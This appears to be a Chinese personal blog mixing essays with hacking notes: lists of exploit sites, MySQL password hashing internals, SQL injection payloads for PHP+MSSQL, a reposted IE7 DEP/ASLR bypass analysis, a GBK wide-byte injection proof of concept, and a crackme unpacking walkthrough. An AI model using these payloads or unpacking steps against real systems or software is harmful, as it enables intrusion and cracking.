KYO的地盘

聊城

一个技术问题演变成商务问题，紧接着又演变为政治问题，我无法理解中国的官场社会。

相对来说，我更喜欢与0和1打交道，人还是太复杂，我没有办法掌控对方的思维下一秒在想什么。所以对于不确定的事，我没有任何兴趣，也不想有任何兴趣。

聊城的温泉还是很不错的，只是一个人的旅游能算是旅游吗？说它是为公事出差附带的附属品我倒没什么意见。

另外对于没有共同语言的人，我一般喜欢选择沉默。有时候为了避免所接触的人把"不合群"这个贬义词强加到我的头上，我曾经试图改变我自己，会附和着一些不着边或者连我自己都不知道的话，现在回头想想才发现这种做法很幼稚，幼稚的让我一个人独处时想起来还会觉得可笑。深思之后我会发现，在这个世界上我在意的人屈指可数，何必委屈自己附和那些不着边际的人呢？

古人云：无欲则刚。这四个字还是很有哲学道理的。

黑客网址记录

0day发布网址Tags>>0day发布网址
1 http://www.frsirt.com

1.http://www.exploit-db.com/

2 http://www.derkeiler.com
http://www.h4cky0u.org

3 http://www.security.nnov.ru/ http://securityvulns.com/

http://governmentsecurity.org/

4 http://pforum.pccenter.com.tw/viewthread.php?tid=67&extra=page%3D1

5 http://www.swerat.com/forums/index.php?act=Login&CODE=01

6 http://chasenet.org/

7 http://swerat.com/
http://www.neoteam.com.br
我先来几个我认为比较好的
http://packetstormsecurity.nl/
http://hack.com.ru/
http://www.hackcoza.tk/
http://www.web-hack.ru/
http://www.securiteam.com/
http://www.security.nnov.ru/
http://www.hackerzhell.co.uk/indexmain.php
http://hacktheb0x.tk/
http://neworder.box.sk/
http://www.k-otik.com/
http://www.security-corporation.com/
http://www.securityfocus.com/

8 http://metasploit.blogspot.com/

9 http://www.godexp.org/
http://www.milw0rm.com/

自己珍藏的0day漏洞发布网址

这些都是我珍藏的好的漏洞发布网址:
国外:
http://www.frsirt.com/exploits/
http://es.wikipedia.org/wiki/Exploit
http://www.securiteam.com/exploits
国内:
http://www.z1z8.com/
http://forum.eviloctal.com/simple/index.php?f22.html

//////////////////////////////////////////////////////////////////////////

国外安全 http://www.neohapsis.com/ 内容极为丰富
国外安全 http://www.deadly.org/ 大量关于OpenBSD的资料文档教程
国外安全 http://www.guninski.com/ 安全专家Guninski的主页，有大量由系统漏洞
国外安全 http://www.sysinternals.com 有很好的windows下的工具及源代码
国外安全 http://www.securityflaw.com/bible/ 入侵检测等文档整理较好的站点
国外安全 http://www.secinf.net/ 网络安全方面的大量文档
国外安全 http://www.incident-response.org 入侵反应，数据恢复工具等
国外安全 http://www.securityfocus.com/ 安全资料整合最好的站
国外安全 http://www.project.honeynet.org/ 由安全界一帮牛人组织的一个

国外安全 http://www.packetstormsecurity.com 资料全面的安全站

国外安全 http://www.securityportal.com/ 还可以看看的安全站

国外安全 http://www.ussrback.com/ 比较活跃的安全站
国外安全 http://www.attrition.org/ 内容全面的安全站
国外安全 http://www.wiretrip.net/rfp/2/index.asp rfp的安全主页，提供权威的安全信息

国外安全 http://www.antionline.com/ 有些特色栏目的安全站
国外安全 http://www.eeye.com/ eeye公司的主页，提供权威性的安全建议和工具
国外安全 http://www.insecure.org/ Fyodor的主页，nmap的老家，还有exploit
国外安全 http://www.atstake.com/ @stack公司的主页，提供权威的安全建议
国外安全 http://www.bugnet.com/ 提供漏洞修补国外黑客 http://lsd-pl.net/ LsD的站,最新最有效的exploit
国外黑客 http://www.s0ftpj.org 提供一些水平很高的小工具 }\]{f6'
国外黑客 http://phrack.org/ Phrack的主页，经典的黑客技术电子杂志
国外黑客 http://www.w00w00.org/ w00w00组织的主页
国外黑客 http://mixter.void.ru/ Mixter的个人主页，不少有用的工具
国外黑客 http://www.thehackerschoice.com/ THC黑客组织的页面，很好的安全文档和工具
国外黑客http:// www.win2000mag.net Windows & .NET Magazine Network 绝对专业的站点,文章都是一流的

国外黑客 http://www.2600.com/ 2600 Magazine
国外黑客 http://www.experts-exchange.com 全球有名的社区
国外黑客 http://www.is-it-true.org 类似于FAQ的站点，资源丰富
国外黑客 http://www.mixter.warrior2k.com mixter security
国外黑客 http://www.liun.hektik.org Long Island our Underground Networks
国外黑客 http://www.ussrback.com ussr is back
国外黑客 http://www.securiteam.com 非常好的安全文章漏洞利用工具下载站点
国外黑客 http://www.lsd-pl.net The Last Stage of Delirium Research Group
国外黑客 http://www. neworder.box.sk Box Network team
国外黑客 http://www.sysinternals.com sysinternals
国外黑客 http://www.webattack.com
国外黑客 http://www.blackhat.com Black Hat, Inc A64bZ
国外黑客 http://p.ulh.as pulhas
国外常用网站站点 http://www.google.com 最好的页面搜索引擎

国外常用网站站点 http://www.netcraft.com 很好的域名搜索引擎

国外常用网站站点 http://www.checkdomain.com 域名信息检索器

国外常用网站站点 http://astalavista.box.sk 最好的注册码、注册机、序列号搜索引擎

收藏~

然后

不知从什么时候起，我注意到现在越来越多的人说话已经离不开"然后"这个词了。特别是现实生活中人与人之间对话中的只言片语很容易体现出这一点。为了对抗这个无聊的世界，我也是没事找事做，思考了这一现象的原因。

我觉得这一现象归根结底就是人们语言表达能力退化的一个标志。大多数人不能在短时间内思考到前一句话与后一句话之间的存在的某种联系，一时又想不出较为合适的词语来衔接，只能用拙劣的"然后"来代替。并且我发现"然后"这个词其实是万能的，不论是因果关系、转折关系、前言不搭后语关系，使用它后倒显得挺自然的。再一点，两个人在对话时，一方为了不凸显自己吞吞吐吐的尴尬，"然后"一词一出就可以为自己赢得5秒钟思考时间来准备下一句的内容，甚至故意把它拖得很长，以便可以理直气壮的思考一大会儿。

也许还有下面一个原因，是我从百度搜出来的结果：

"就是因为大家看了太多台湾电视电影才传过来的啊，呵呵。"

其实我亦是一样的。在这个信息化的时代，计算机所带来的优点当然是数不胜数，可是它却让人们之间的交流变得越来越少，亲人与亲人之间、朋友与朋友之间、同学与同学之间，言语上的都变得淡漠。
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

全民种菜，然后凸显全民无聊，然后中国人大多数其实都很无聊，然后我发现北京人大多数都喜欢说自己多牛逼、谁谁谁多牛逼，然后我觉得谁都不牛逼，然后我心中的神已死，然后我觉得其实只有死了的人才牛逼。
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

mysql 口令算法

唠一唠mysql的口令算法

Author: kyo327
email: humour327#hotmail.com
Date: 2010-03-10

大家都知道mysql口令的加密分两种。一种是古董级别的mysql323加密，另一种是蒙骗了大众的的mysql sha1加密。
虽然现在遇到这样的加密可以用cain来破解，按说我不用在这里多此一举，但本文不是为了破解而写，只是科普一下，让大家更清楚的了解mysql口令的加密方法到底是怎样的。

先说mysql4.1.x版本以后的：

mysql> select password('kyo327');
+-------------------------------------------+
| password('kyo327') |
+-------------------------------------------+
| *B19CB640DF626A73397BFBBB8111D11E2BEC11F1 |
+-------------------------------------------+
1 row in set (0.02 sec)

mysql> select sha1('kyo327');
+------------------------------------------+
| sha1('kyo327') |
+------------------------------------------+
| d81e2a1a72f5a4f570b0f05baaa0cffc5d2d6820 |
+------------------------------------------+
1 row in set (0.03 sec)

很明显不是标准的sha1加密。然而这个问题像是皇帝的新装一样，好像没有哪个人指出来，那我就在这里当一次无知的小孩吧。再看下面

mysql> select sha1(0xd81e2a1a72f5a4f570b0f05baaa0cffc5d2d6820);
+--------------------------------------------------+
| sha1(0xd81e2a1a72f5a4f570b0f05baaa0cffc5d2d6820) |
+--------------------------------------------------+
| b19cb640df626a73397bfbbb8111d11e2bec11f1 |
+--------------------------------------------------+
1 row in set (0.00 sec)

我想无需用过多言语，大家应该都很清楚mysql4.1.x以后版本的加密方式了吧。

接下来说一说mysql323加密。

这个我是直接从mysql源代码里抠出来的。代码如下：

#include "stdio.h"
#include

void hash_password(long *result, const char *password, int password_len)
{
register long nr=1345345333L, add=7, nr2=0x12345671L;
long tmp;
const char *password_end= password + password_len;
for (; password < password_end; password++)
{
if (*password == ' ' || *password == '\t')
continue; /* skip space in password */
tmp= (long) (char) *password;
nr^= (((nr & 63)+add)*tmp)+ (nr << 8);
nr2+=(nr2 << 8) ^ nr;
add+=tmp;
}
result[0]=nr & (((long) 1L << 31) -1L); /* Don't use sign bit (str2int) */;
result[1]=nr2 & (((long) 1L << 31) -1L);
}

int main(int argc, char* argv[])
{
const char *password="kyo";
long hash_res[2];
hash_password(hash_res, password, (int) strlen(password));
printf("%08lx%08lx\n", hash_res[0], hash_res[1]);
return 0;
}

运行后
7901b47128d1045d
-----------------------------------------------------------------------------------
mysql> select old_password('kyo');
+---------------------+
| old_password('kyo') |
+---------------------+
| 7901b47128d1045d |
+---------------------+
1 row in set (0.00 sec)
-----------------------------------------------------------------------------------

over。
想做mysql密码爆力破解工具的，根据本文应该很容易写出来了。
------------------------------------------------------------------------------------------------------

mysql> use mysql;
Database changed
mysql> select password from user where user='root';

///////////////////////////////////////////////////////////////////////////////////////////
select password from mysql.user where user='root';

tips 条件断点

在mysql中。
mysql> select * from z_admin where admin='admi\'';
Empty set (0.00 sec)
mysql> select * from z_admin where admin='admi\';
'> ';
Empty set (0.02 sec)

可以看到这个语句是没法执行的。
select * from z_admin where admin='admi\'
应该是把\'解释成字符串中的单引号了，那么就缺少闭合的单引号。
----------------------不华丽的分割线-------------------------------------
而在mssql中。
select * from backupfile where filegroup_name='de\''
会出现这种情况。
服务器: 消息 105，级别 15，状态 1，行 1
字符串 'de\'
' 之前有未闭合的引号。
服务器: 消息 170，级别 15，状态 1，行 1
第 1 行: 'de\'
' 附近有语法错误。

select * from backupfile where filegroup_name='de\'
语句这样的话能顺利执行。
这说明 mssql是只鸳鸯啊，只要不是成对出现就不让你执行，和mysql刚好相反。

有什么用呢？？？？
我说一种，其他的自己琢磨。
在php+mssql的环境下当magic_quotes_gpc==on时，不用管他。
开启错误提示的话 fuck.php?a=aaaaa' and @@version=0--
and后面随便跟什么语句慢慢来爆

没开错误提示的话。直接fuck.php?a=aaaaa' union select 1,2,3-- 慢慢猜吧

////////////////////////////////////////////////////
下注册表函数的断点。
在RegQueryValueExA处下条件断点：[esp+8]=="ProgData"&&[esp+14]!=0
在RegOpenKeyExA处下条件断点：[esp+8]=="Software\\EUsoft\\superdic"

唠一唠加密与解密

Author: kyo327
email: humour327#hotmail.com
Date: 2010-03-03

我认为加密与解密就是高级智慧生物一种脑力活动方式，也是区别于其他动物最明显的标志之一。几千年以前凯撒曾经使用一种加密方法用于传递战争中的信息，其实这段历史足以说明加密解密是人类智慧的结晶。在冷兵器时代打仗不就是两军交战，多者胜吗？但是信息加密的出现打破了这种常规，在测探军机要情后总要经过信息的传递，而那种加了密的信息即便被对方截获也看不出东南西北来，这样在知己又知彼的情况下再熟练的运用三十六计很容易就能以少胜多了。可见信息加密的重要性。

计算机的面世凸现了人类喜欢利用加密与解密庸人自扰的现实。很早的时候软件程序根本没有壳的概念，因为没有很多人看的懂那些二进制代码，所以程序作者可以用最简单的直接比较的认证方式来阻挡没有付费的使用者。随着学习计算机的人越来越多，无聊的人就编出了反汇编器，这样二进制代码被转换成了汇编指令，人们理解程序流程就方便多了。眼看程序开发者辛辛苦苦开发的软件被人们轻易的破解，于是壳出现了，越来越多的加密算法也出现了。而破解者也不甘心，有加密就有解密，不然算法的设计者也无法解出答案。而最无辜的用户始终是受害者，他们想要的仅仅是程序的应用，却不得不运行程序之外为了阻挡破解者的壳、VM、成千上万行的垃圾代码，软件的运行速度竟然要卡十几秒钟才能启动。用户也许很疑惑，现在电脑的硬件CPU都是4核的，内存4G还是双通道的，可为什么还不如win98时代在64M内存的机器上的运行速度呢？其实用户每运行一次加了VM的软件，还要连带的安装并运行一个带解释器的虚拟机，那速度能快得起来才真是奇迹呢。也许很多人认为那些设计VM的作者的脑袋应该是被驴踢了，其实我觉得也是。但我们应该知道，这可能也不是他们的意愿，是被那些无聊的破解者给逼出来的。而用户都成了设计开发者与破解者智慧斗争中的牺牲品。

其实网络安全的世界也是一样的，如果没有黑客，程序开发者闲的蛋疼才去过滤那些乱七八糟的特殊字符呢，他们巴不得把应用设计好了就利用空余时间偷偷菜呢。而利用WEB赚钱的企业所部署的防火墙、招聘的网络安全工程师、购买的漏洞扫描软件等等所花费的RMB不会是从天上掉下来的，羊毛出在羊身上，吃亏的还是无辜的用户。因此用户又一次成了程序员与黑客智慧斗争的牺牲品。

也许在我为所不知的很多领域，用户应该也是所有无聊者与对抗无聊者之间斗争的牺牲品。

(转)How to Bypass DEP+ASLR+SEHOP

昨天去SSCON2009听TK讲了一个议题"安全漏洞的下一个十年"，佩服TK的演讲的幽默风趣，MS一个

非常具有忽悠的议题讲的很生动，精彩，再次膜拜下，我个人觉得里面最精彩部分就在如下了，呵呵，

通过MS08-078这个去年的IE7的漏洞来介绍如何绕过windows现有的安全保护机制，很是受启发，因为

TK只有一张PPT的介绍，我在此想展开介绍的更详细点，和大家分享一下TK的研究成果：），未经TK

的同意，在此还要感谢下TK:)

我去年分析过这个漏洞，现在让我们看看，到底是如果绕过windows现有的DEP,ALSR,SEHOP这些安全

保护机制的。

if(wxp||w2k3)document.write(
'

]]>

漏洞细节就不介绍了，构造如此数据在这个Poc中

0x0a0a11c8

通过Heap spray在内存中填充0x7ffe027c这个值，为什么要填充如下值，下面会作介绍。

mshtml.dll CXfer::TransferFromSrc(void)
.text:461E3D18 public: long __thiscall CXfer::TransferFromSrc(void) proc near
.text:461E3D18 ; CODE XREF: CXfer::ColumnsChanged(ulong,ulong * const)+33 p
.text:461E3D18 ; CDataBindingEvents::TransferFromSrc(CElement *,long)+24 p ...
.text:461E3D18
.text:461E3D18 pvarg = VARIANTARG ptr -18h
.text:461E3D18 var_8 = dword ptr -8
.text:461E3D18 var_4 = dword ptr -4
.text:461E3D18
.text:461E3D18 mov edi, edi
.text:461E3D1A push ebp
.text:461E3D1B mov ebp, esp
.text:461E3D1D sub esp, 18h
.text:461E3D20 push ebx
.text:461E3D21 push esi
.text:461E3D22 mov esi, ecx
.text:461E3D24 xor ebx, ebx
.text:461E3D26 test byte ptr [esi+1Ch], 9
.text:461E3D2A jnz loc_461E3E2E

.text:461E3D30 mov eax, [esi] //eax==0x0a0a11c8
.text:461E3D32 cmp eax, ebx
.text:461E3D34 jz loc_461E3E29
.text:461E3D3A cmp [esi+4], ebx
.text:461E3D3D jz loc_461E3E29
.text:461E3D43 cmp [esi+8], ebx
.text:461E3D46 jz loc_461E3E29
.text:461E3D4C mov ecx, [eax] //[0x0a0a11c8]==0x7ffe027c
.text:461E3D4E push edi
.text:461E3D4F push eax //eax==0x0a0a11c8
.text:461E3D50 call dword ptr [ecx+84h] //call [0x7FFE027C+0x84], 换句话说就是call

[0x7ffe0300], 这是SharedUserData!SystemCallStub指针，这个指针里面存放着用户态进入内核态

ntdll!KiFastSystemCall函数的地址，也就是任何内核系统服务调用都会通过这个函数进入内核。

this call request for native API.// this call like call NtUserLockWorkStation for lock the windows:)

0:000> dd SharedUserData!SystemCallStub
7ffe0300 7c828608 7c82860c 00000000 00000000
7ffe0310 00000000 00000000 00000000 00000000
7ffe0320 00d2c763 00000000 00000000 00000000
7ffe0330 71724108 00000000 00000000 00000000
7ffe0340 00000000 00000000 00000000 00000000
7ffe0350 00000000 00000000 00000000 00000000
7ffe0360 00000000 00000000 00000000 00000000
7ffe0370 00000000 00000000 00000000 00000000

0:000> u 7c828608
ntdll!KiFastSystemCall:
7c828608 8bd4 mov edx,esp
7c82860a 0f34 sysenter
ntdll!KiFastSystemCallRet:

我们再看看这个0x11c8这个值构造的用意，先让我们看看锁屏函数NtUserLockWorkStation，也就是直接

调用这个函数就是会实现锁屏功能。

0:000> u 773ddd0d
USER32!NtUserLockWorkStation:
773ddd0d b8c8110000 mov eax,11C8h //
773ddd12 ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
773ddd17 ff12 call dword ptr [edx]
773ddd19 c3 ret

我们再看看这个ie7的漏洞的片断
.text:461E3D46 jz loc_461E3E29
.text:461E3D4C mov ecx, [eax] //[0x0a0a11c8]==0x7ffe027c
.text:461E3D4E push edi
.text:461E3D4F push eax //eax==0x0a0a11c8//这里的实现是不是跟NtUserLockWorkStation很
相似
.text:461E3D50 call dword ptr [ecx+84h] //call [0x7FFE027C+0x84]

也许大家会问NtUserLockWorkStation的代码片断是mov eax,0x11c8，而上面的代码的eax是0x0a0a11c8，

事实在内核中处理过程，来通过传入的eax的值来判断是哪个服务调用，其实只用了低两个字节，所以

0x0a0a11c8可以忽略高两个字节，对服务调用结果不影响，所以完全可以当成是执行了锁屏操作。

结论：

1.通过Heap spray注入内存的构造的数据绕过DEP，因为没有在堆上执行代码

2.绕过ASLR，是因为内核服务调用的入口地址是不会变化的，只要能够构造相应的内核调用需要用到的

参数，就可以执行类似这样的shellcode，但是局限性也很明显了，因为这样构造出来的shellcode功能很

有限，就像TK演示的那样，制造了一个锁屏的操作。

3.利用起来非常困难，但就理论上就对抗windows的这些安全保护机制，算是绕过了，呵呵：）

写的匆忙，多多包涵，再次感谢TK提供的这种想法：）

PHP字符编码绕过漏洞总结

该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时，0xbf27本身不是一个有效的GBK字符，但经过 addslashes() 转换
后变为0xbf5c27，前面的0xbf5c是个有效的GBK字符，所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理，结果漏洞
就触发了。
mysql_real_escape_string() 也存在相同的问题，只不过相比 addslashes() 它考虑到了用什么字符集来处理，因此可以用相
应的字符集来处理字符。在MySQL 中有两种改变默认字符集的方法。
方法一：
改变mysql配置文件my.cnf
CODE:
[client]
default-character-set=GBK
方法二：
在建立连接时使用
CODE:
SET CHARACTER SET 'GBK'
例：mysql_query("SET CHARACTER SET 'gbk'", $c);
问题是方法二在改变字符集时mysql_real_escape_string() 并不知道而使用默认字符集处理从而造成和 addslashes() 一样的漏洞
下面是来自http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html的测试代码

$c = mysql_connect("localhost", "user", "pass");
mysql_select_db("database", $c);

// change our character set
mysql_query("SET CHARACTER SET 'gbk'", $c);

// create demo table
mysql_query("create TABLE users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET 'GBK'", $c);
mysql_query("insert INTO users VALUES('foo','bar'), ('baz','test')", $c);

// now the exploit code
$_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username /*';
$_POST['password'] = 'anything';

// Proper escaping, we should be safe, right?
$user = mysql_real_escape_string($_POST['username'], $c);
$passwd = mysql_real_escape_string($_POST['password'], $c);

$sql = "select * FROM users where username = '{$user}' AND password = '{$passwd}'";
$res = mysql_query($sql, $c);
echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records

?>
纵观以上两种触发漏洞的关键是addslashes() 在Mysql配置为GBK时就可以触发漏洞，而mysql_real_escape_string() 是在不知
道字符集的情况下用默认字符集处理产生漏洞的。
下面再来分析下国内最近漏洞产生的原因。
问题出现在一些字符转换函数上，例如mb_convert_encoding()和iconv()等。
发布在80sec上的说明说0xc127等一些字符再被addslashes() 处理成0xc15c27后，又经过一些字符转换函数变为0×808027，而使得经过
addslashes() 加上的"\"失效，这样单引号就又发挥作用了。这就造成了字符注入漏洞。
根据80sec的说明，iconv()没有该问题，但经我用0xbf27测试
$id1=mb_convert_encoding($_GET['id'], 'utf-8', 'gbk');
$id2=iconv('gbk//IGNORE', 'utf-8', $_GET['id']);
$id3=iconv('gbk', 'utf-8', $_GET['id']);
这些在GPC开启的情况下还是会产生字符注入漏洞，测试代码如下：

$c = mysql_connect("localhost", "user", "pass");
mysql_select_db("database", $c);

// change our character set
mysql_query("SET CHARACTER SET 'gbk'", $c);

// create demo table
mysql_query("create TABLE users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET 'GBK'", $c);
mysql_query("insert INTO users VALUES('foo','bar'), ('baz','test')", $c);

// now the exploit code
//$id1=mb_convert_encoding($_GET['id'], 'utf-8', 'gbk');
$id2=iconv('gbk//IGNORE', 'utf-8', $_GET['id']);
//$id3=iconv('gbk', 'utf-8', $_GET['id']);

$sql = "select * FROM users where username = '{$id2}' AND password = 'password'";
$res = mysql_query($sql, $c);
echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records

?>
测试情况 http://www.safe3.cn/test.php?id=%bf%27 OR username = username /*

后记，这里不光是%bf，其它许多字符也可以造成同样漏洞。

(转)理解vmp

vmp里面只有1个逻辑运算指令 not_not_and 设这条指令为P
P(a,b) = ~a & ~b

这条指令的神奇之处就是能模拟 not and or xor 4条常规的逻辑运算指令
怕忘记了，直接给出公式，后面的数字指需要几次P运算

not(a) = P(a,a) 1
and(a,b) = P(P(a,a),P(b,b)) 3
or(a,b) = P(P(a,b),P(a,b)) 2
xor(a,b) = P(P(P(a,a),P(b,b)),P(a,b)) 5

上面的次数应该是最少需要的次数了，当然也可以展开，那样就更加复杂了
vmp用1条指令模拟了4条指令，因此逆向起来比较复杂，如果中间夹杂垃圾运算，那么工程量非同小可
下面来证明一下上面4条等式

not(a) = ~a = ~a & ~a = P(a,a)
and(a,b) = a & b = ~(~a) & ~(~b) = P(not(a),not(b)) = P(P(a,a),P(b,b))
or(a,b) = a | b = ~(~(a|b)) = ~(~a & ~b) = ~P(a,b) = P(P(a,b),P(a,b))
xor(a,b) = ~a & b | a & ~b = ~(~(~a & b | a & ~b)) = ~(~(~a & b) & ~(a & ~b)) = ~((a | ~b) & (~a | b)) = ~(1 | 1 | a & b | ~a & ~b) = ~(a & b) & ~(~a & ~b) = P(and(a,b),P(a,b)) = P(P(P(a,a),P(b,b)),P(a,b))

上面的xor是最复杂的，不过简化后也只需要5次运算就可以实现了

至于eflag，eflag是根据结果来定的，由于都是逻辑运算，所以最后取一下eflag即可

在某修改版的vm中，还可以看到另一个强大的指令 not_not_or 设这条指令为Q
Q(a,b) = ~a | ~b

同样，这一条指令可以模拟4条常规的逻辑运算指令
怕忘记了，直接给出公式，后面数字表示需要几次Q运算

not(a) = Q(a,a) 1
and(a,b) = Q(Q(a,b),Q(a,b)) 2
or(a,b) = Q(Q(a,a),Q(b,b)) 3
xor(a,b) = Q(Q(Q(a,a),b),Q(a,Q(b,b))) 5

基本和上面P指令相同，效率没什么变化
只对最复杂的xor证明一下，以防忘记

xor(a,b) = ~a & b | a & ~b = ~(~(~a & b | a & ~b)) = ~(~(~a & b) & ~(a & ~b)) = ~((~(~a) | ~b) & (~a | ~(~b))) = ~(~(~a) | ~b) | ~(~a | ~(~b)) = Q(Q(not(a),b),Q(a,not(b))) = Q(Q(Q(a,a),b),Q(a,Q(b,b)))

脱一个壳玩玩

这次不用ImportREC 重建输入表，自己手工建一个试试。
目标在附件里。
这个壳OEP比较好找。直接用OD的sfx就到了。
oep:47148b
当然断GetVersion 也可以。
//////////////////////////////////
最常规的
0047A034 <> 60 pushad
0047A035 9C pushfd
0047A036 E8 8E000000 call CrackMe.0047A0C9 ; 来到这里 esp定律命令行下hr esp
0047A03B C3 retn

F9运行来到这里：
0037087A E8 980D0000 call 00371617 ; f7走一下
0037087F 51 push ecx
00370880 E9 600C0000 jmp 003714E5

00371617 8D6424 04 lea esp,dword ptr ss:[esp+4] ; 这里
0037161B 61 popad
0037161C ^ E9 E7F9FFFF jmp 00371008 ; 这里继续F7

00371008 - FFE0 jmp eax ; 跳向oep
、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、

到OEP后知道iat被加密了是这样的

00475000 003E2264
00475004 003E21A0
00475008 003E2137
0047500C 003E2328
00475010 003E215F
00475014 00000000
00475018 003E624C
0047501C 003E47DB
00475020 003E5C30
00475024 003E7088
00475028 003E50A2
0047502C 003E465C
00475030 003E2D4C
00475034 003E32E7
00475038 003E73C7
0047503C 003E6274
00475040 003E5814
00475044 003E7207
00475048 003E524D
0047504C 003E53F8
00475050 003E5061
///////////////////////////////////////////
重新来，在475000处下内存写入断点。可以到这里：
/*7C921DE6*/ REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] //这里
/*7C921DE8*/ JMP DWORD PTR DS:[EDX*4+7C921F00]
/*7C921DEF*/ MOV EAX,EDI
/*7C921DF1*/ MOV EDX,3
/*7C921DF6*/ SUB ECX,4
/*7C921DF9*/ JB SHORT ntdll.7C921E07
/*7C921DFB*/ AND EAX,3

f8一下后IAT就添充完了。如下：

00475000 00075812
00475004 00075806
00475008 000757EE
0047500C 000757E2
00475010 00075822
00475014 00000000
00475018 00075A6E
0047501C 00075A5C
00475020 00075A4E
00475024 00075A3E
00475028 00075A32
0047502C 00075A26
00475030 00075A1C
00475034 00075A10
00475038 00075A04
0047503C 00075A7E
00475040 000759EC
00475044 000759DE
00475048 000759D0
0047504C 000759C2
00475050 000759B2
00475054 00075998

/////////////////////////////////////
这个一看就是原始的输入表，那还等啥？直接用 LordPE 修正镜像大小，然后 dump。
用 PETools 的编辑工具把 dump 程序的 OEP 改成 007148b，再用16进制编辑工具定位到偏移 75000 处.
第一个是75812，在winhex中拉到75812后再往上拉，再找到75812开头的地方。这时发现输入表没有了。
那只能自己重建一个了。

先熟悉下输入表结构吧。

IMAGE_IMPORT_DESCRIPTOR结构的各个域的含义:
1)union {
DWORD Characteristics;
DWORD OriginalFirstThunk;
};
这个联合指向一个 IMAGE_THUNK_DATA 类型的结构数组. 其实这个字段为0也行。

2)TimeDateStamp
该dll的时间日期戳,一般为0.

3)ForwarderChain
正向连接索引.一般为0.

4)Name
dll名字的RVA.

5)FirstThunk
这个域也是一个RVA,指向一个DWORD数组,数组以NULL结束.数组中的每个DWORD实际上是一个IMAGE_THUNK_DATA结构的联合体。IMAGE_THUNK_DATA联合体通常被解释为一个指向IMAGE_IMPORT_BY_NAME结构的RVA.

大小是5个dword. 程序里有多少个dll，就有多少个这样的结构，最后由20个0结尾。

///////////////////////////////////////////////////////
既然本程序没有输入表，我就在75b10处建一个吧。

第一个DWORDOriginalFirstThunk指向75812的rva是7550c.
第2，3个DWORD都填0.
第4个DWORD是指向dll的rva.找到dll的位置填上去为 75834
第5个DWORD是上面的指向75812的rva，找到是75000.

看到一共是3个dll。按照这个格式把那两个结构也写到后面即可。
改完后是这样的
：75b10
0C550700000000000000000034580700
00500700245507000000000000000000
D85A070018500700C457070000000000
00000000D6570700B450070000000000

完了后再用pe工具把iat的rva改为75b10 大小改为50即可。
/////////////////////////////////////////

由于union {
DWORD Characteristics;
DWORD OriginalFirstThunk;
};
这个为0也行所以改为下面也行
000000000000000000000000D85A0700
18500700000000000000000000000000
34580700005007000000000000000000
00000000D6570700B450070000000000
///////////////////////////////////////////////////////////////
以上只是练习下手工建IAT的方法其实下面方法最简单。
0047A41B FFD2 call edx F7进入
ctrl+B 搜

0F 85 A5 F5 ?? FF
将搜到指令的jnz 改成jmp 即可
壳就不加密IAT了

File: Click to Download